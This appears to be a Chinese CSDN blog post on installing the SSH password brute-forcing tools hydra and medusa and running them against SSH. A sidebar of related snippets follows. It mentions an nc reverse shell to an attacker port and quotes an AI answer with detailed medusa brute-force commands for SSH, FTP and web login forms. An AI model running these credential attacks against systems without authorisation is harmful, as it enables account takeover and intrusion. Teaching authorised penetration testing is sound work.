【介绍两款SSH爆破工具 hydra+medusa】

最新推荐文章于 2025-06-10 09:34:03 发布

原创最新推荐文章于 2025-06-10 09:34:03 发布 · 1.6w 阅读

3 ·

CC 4.0 BY-SA版权

【Linux】专栏收录该内容

3 篇文章

订阅专栏

本文介绍了如何从源代码安装密码破解工具Hydra和Medusa，并提供了基本的使用指南。通过wget下载对应的源码包，解压并进入目录进行配置、编译和安装。此外还展示了如何利用这些工具进行SSH登录尝试。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

1. 安装hydra

wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
tar zxf hydra-6.3-src.tar.gz
cd hydra-6.3-src
./configure
make
make install

使用hydra

hydra 127.0.0.2 ssh -l root -P pass.txt #pass.txt为爆破字典,具体怎要看使用手册

2. 安装medusa

wget  href="http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz">http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz
tar -zxvf medusa-2.1.1.tar.gz
cd medusa-2.1.1
./configure
make
make install

使用

medusa -d #查看medua支持的模块
medusa -H ip.txt -u root -P p.txt -M ssh

其实这两款工具在ubuntu下，是直接可以apt-get install 的

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

DylanZQL

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[原创]内网SSH密码爆破工具sshcrack(配合Cscan批量弱口令检测)

weixin_30414245的博客

06-10

2589

0x000 前言 sshcrack是一个命令行下的SSH密码爆破工具,适用于内渗中SSH密码检测当然也可用于外网SSH密码爆破，支持Windows/Linux,其它系统未测。Tip1 0x001 目录 1.sshcrack用法 2.Cscan批量扫描 3.连接SSH执行命令 4.sshcrack源码 5.SSH批量上控 6.工具下载 0x002 用法指定SSH服务器密码检...

Kali下的SSH爆破工具

7Riven's blog

11-24

6846

1.hydra（九头蛇）工具使用已知用户，进行密码爆破 hydra -l zhangsan -P /root/passwd.txt ssh://192.168.10.1 使用已知密码，进行用户爆破 hydra -L /root/user.txt -p 123.com ssh://192.168.10.1 使用用户字典、密码字典，对多个目标主机进行爆破 hydra -L /root/user...

参与评论您还未登录，请先登录后发表或查看评论

Shreder：线程SSH协议密码爆破工具

weixin_43977912的博客

10-08

1147

关于Shreder Shreder是一款功能强大的多线程SSH协议密码爆破工具，广大研究人员可以使用Shreder对SSH协议的安全性进行探究。功能介绍能够快速执行密码爆破，每个密码仅需1秒；经过优化处理，支持大型密码字典，Shreder尝试1000个密码仅需1分40秒；简单的命令行接口和API使用方法；工具安装由于Shreder使用Python3开发，因此首先需要在本地设备上安装并配置好Python3环境。接下来，广大研究人员可以使用下列命令下载并安装Shreder： pip3 install

一次SSH爆破攻击haiduc工具的应急响应

最新发布

Python84310366的博客

06-10

740

2022年3月底，我安服团队在网络安全监测中发现某网络攻击组织利用SSH爆破投放挖矿程序的活动比较活跃，主要涉及的是一个haiduc的工具。二、检测定位****阶段工作说明**2.1、**异常现象确认服务器被植入木马病毒，并对内网进行暴力破解。本次发起暴力破解的主机为10.101.2.210。**2.2、**溯源分析过程通过态势感知查看暴力破解检测日志，发现最早从2月16日凌晨3点半左右出现暴力破解告警情况，攻击源为10.101.2.210服务器。三、抑制阶段工作说明。

使用hydra进行SSH爆破

qq_53218512的博客

06-02

8416

mobaxterm 的功能非常全面，几乎提供了所有重要的远程网络工具（比如 SSH、X11、RDP、VNC、FTP、MOSH 等），以及 Windows 桌面上的 Unix 命令（bash、ls、cat、sed、grep、awk、rsync 等），登录之后默认开启 sftp 模式。命令的意思是：使用bin.bash里面的shell，用nc命令反弹shell，反弹到攻击机的7777端口，-e代表需要执行的指令，这里是要执行/bin/bash。发现通过计划任务执行了bash/tmp下面的task.sh文件。

【WEB_脚本开发】简易SSH爆破工具

HWHXY的博客

03-09

807

https://github.com/hwhxy/sshCrack

SSH爆破工具hydra.zip

gitblog_06702的博客

04-30

439

SSH安全测试工具hydra.zip 【下载地址】SSH爆破工具hydra.zip 本开源项目提供SSH安全测试工具Hydra的下载资源，帮助安全测试人员评估SSH服务的安全性。Hydra是一款功能强大的密码测试工具，适用于系统安全评估。请确保在合法授权下使用，遵守相关法律法规，不得用于非法入侵或商业用途。合理使用本工具...

爆破工具安装-centos6.10 神奇hydra\medusa\patator安装

max_ss的专栏

03-19

3597

因实验需要，需要在现有机器上安装hydra、medusa、patator等爆破工具一、安装hydra （参考：https://bugging.com.cn/2018/05/16/centos6-%E5%AE%89%E8%A3%85hydra/） 1.从GitHub下载安装包:https://github.com/vanhauser-thc/thc-hydra/releases 2.tar...

burp爆破mysql_使用BurpSuite、Hydra和medusa爆破相关的服务

weixin_32272937的博客

01-26

844

一、基本定义1、爆破=爆破工具(BP/hydra)+字典(用户字典/密码字典)。字典：就是一些用户名或者口令(弱口令/使用社工软件的生成)的集合。2、BurpSuite渗透测试神器，使用Java开发，功能齐全，方便渗透测试人员去测试Web站点，这里用来爆破Web登录窗口。3、Hydra九头蛇，开源的功能强大的爆破工具，支持的服务有很多，使用hydra爆破C/S架构的服务。4、medusa美杜莎，开...

密码爆破工具：Medusa(美杜莎)-操作说明

热门推荐

逆向思维

03-03

3万+

科普下: Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, PostgreSQL, rexec, rlogin, rsh, SMB, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC的密码爆破工具。最近

暴力破解medusa美杜莎 hydra海德拉命令详情

期待nila

05-30

1343

本章借助nmap工具获取了模拟环境下服务端开放的高危端口，通过crunch工具生成了密码字典，通过hydar工具成功破解了服务端的，获取信息

SHH爆破linux工具

01-13

这个爆破工具个人用的感觉非常的不错啊其实都不想法出来的为了装点下载BB

ssh爆破工具hydra.zip

04-27

ssh爆破工具hydra.zip

多线程SSH爆破

04-23

ssh环境,通过action触发一个多线程任务,每个任务调用一个继承HibernateDaoSupport的service的方法,现在要每个线程都绑定一个新的hibernate session

Kali下ssh爆破以及nikto工具漏洞扫描-漏洞银行大咖周3 -屌丝绅士

01-26

来源：漏洞银行大咖面对面一周大咖秀3 作者：屌丝绅士

Hydra爆破SSH

HAKUNAMATATATTA的博客

11-28

2193

Hydra是一款开源的暴力破解工具，支持FTP、MSSQL、MySQL、PoP3、SSH等暴力破解。

hydra ssh

ban47491的博客

03-19

717

例子： hydra -l root -P '/root/4wei.txt' -t 6 -V ssh://192.168.240.3 备注： -t 线程 -l（小写）表示单个用户，-P（大写）表示多个密码，所以小写表示单个，大写就表示多个 -s 并非每个SSH服务器都在端口22上运行。聪明的管理员一直在更改它们。如果它是您的服务器，您将知道您需要指定的端口。如果您已被雇...

暴力破解工具Hydra 常用命令总结

weixin_51693574的博客

11-18

1929

暴力破解工具Hydra 常用命令总结命令： -R 修复之前使用的aborted/crashed session -S 执行SSL(Secure Socket Layer)连接 -s Port 使用非默认服务器端口而是其他端口时，指定其端口 -l Login 已经获取登录ID的情况下输入登录ID -L FILE 未获取登录ID情况下指定用于暴力破解的文件（需要指出全路径） -p Pass 已经获取登录密码的情况下输入登录密码 -P FILE 未获取登录密码的情况下指

两款SSH爆破工具的介绍：hydra+medusa

William234的博客

03-20

9762

两款SSH爆破工具的介绍：hydra+me...

怎么使用Medusa加字典进行爆破

02-26

<think>好的，我现在需要帮助用户了解如何使用Medusa结合字典进行爆破攻击。用户之前已经询问过如何在Kali中生成字典，现在转向具体的工具使用，说明他们可能正在进行渗透测试的学习或实践。接下来要详细解释Medusa的使用方法，同时确保他们了解合法性和道德规范。首先，我应该回顾Medusa的基本功能，它是一个网络服务爆破工具，支持多种协议。用户可能需要知道如何安装Medusa，但Kali通常已经预装了，所以可能不需要太多安装步骤，但还是要简单提一下。然后，需要解释基本命令结构，特别是如何指定目标、用户列表、密码字典、模块等参数。用户可能对参数的具体用法不太清楚，比如模块的选择，不同的服务对应的模块名称，例如ssh、ftp、http-post-form等。需要举几个常见服务的例子，比如SSH和FTP，说明具体的命令格式。此外，用户可能需要了解如何处理结果，保存输出日志，以及如何组合其他参数优化攻击。同时，用户可能对性能优化感兴趣，比如线程控制、超时设置等。需要提到这些参数的作用和调整建议。另外，用户可能不知道如何自定义模块，比如针对HTTP POST表单的爆破，需要举例说明如何构造请求字符串，这部分可能比较复杂，需要详细说明。还要注意提醒用户合法性，强调未经授权的攻击是非法的，必须在授权范围内进行。此外，爆破可能触发目标的安全机制，如账户锁定或IP封禁，需要提醒他们注意风险。用户可能有更深层的需求，比如如何选择有效的字典，或者如何处理爆破后的结果，是否需要进一步解释日志分析。不过当前问题集中在Medusa的使用，所以先集中回答，最后可以建议他们如果有其他需求可以继续提问。需要检查是否覆盖了所有关键点：安装、基本语法、常用模块示例、参数说明、自定义模块、注意事项和优化建议。确保步骤清晰，示例具体，用户能够按照步骤操作。同时，语言要简明，避免技术术语过于复杂，必要时进行解释。</think>以下是使用 **Medusa** 结合字典进行爆破攻击的详细步骤和注意事项： --- ### **1. Medusa 简介** Medusa 是一款快速、稳定的网络服务暴力破解工具，支持多种协议（如 SSH、FTP、HTTP、SMB 等），通过字典对目标账号密码进行爆破。 --- ### **2. 安装 Medusa** Kali Linux 默认已安装 Medusa。若需手动安装： ```bash sudo apt update && sudo apt install medusa ``` --- ### **3. 基本命令语法** ```bash medusa -h <目标IP> -U <用户名字典路径> -P <密码字典路径> -M <服务模块> [其他参数] ``` **关键参数说明**： - `-h`：目标 IP 地址或域名（如 `-h 192.168.1.100`）。 - `-U`：用户名字典文件（每行一个用户名）。 - `-P`：密码字典文件（每行一个密码）。 - `-M`：指定服务模块（如 `ssh`、`ftp`、`http-post-form`）。 - `-t`：线程数（默认 16，建议根据性能调整）。 - `-O`：保存结果到日志文件（如 `-o result.log`）。 - `-f`：发现有效凭证后立即停止。 --- ### **4. 常用服务爆破示例** #### **4.1 SSH 爆破** ```bash medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh -t 4 -O ssh_results.log ``` #### **4.2 FTP 爆破** ```bash medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ftp -t 8 ``` #### **4.3 HTTP POST 表单爆破** （适用于登录页面） ```bash medusa -h http://example.com/login.php -M http-post-form -m FORM:/login.php:username=^USER^&password=^PASS^:Login Failed -U users.txt -P passwords.txt ``` - `-m`：模块参数，需指定表单路径、提交字段及错误响应关键词（`Login Failed`）。 --- ### **5. 自定义模块参数** 对于复杂协议（如自定义 HTTP 接口），需手动构造请求参数： ```bash medusa -M http-post-form -m PATH:/api/login:DATA="user=^USER^&pass=^PASS^":FAIL="Invalid credentials" ``` --- ### **6. 注意事项** 1. **合法性**：仅在授权范围内使用，避免触犯法律。 2. **性能优化**： - 调整线程数（`-t`）避免触发目标防御机制（如 IP 封锁）。 - 使用精准字典（如目标常用密码规则）提升成功率。 3. **错误处理**： - 若返回 `ACCOUNT CHECK FAILED`，检查目标服务是否可用或模块是否匹配。 - 日志文件（`-O`）用于分析失败/成功记录。 --- ### **7. 示例完整命令** ```bash medusa -h 10.0.0.5 -U /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/rockyou.txt -M ftp -t 6 -O ftp_attack.log -f ``` --- ### **8. 替代工具推荐** 若 Medusa 兼容性不佳，可尝试： - **Hydra**：功能更全面的爆破工具（`hydra -l user -P passwords.txt ftp://192.168.1.100`）。 - **Ncrack**：专攻网络认证协议（如 RDP、Telnet）。 --- 如有具体场景（如破解路由器或数据库），可提供更多细节以便针对性指导！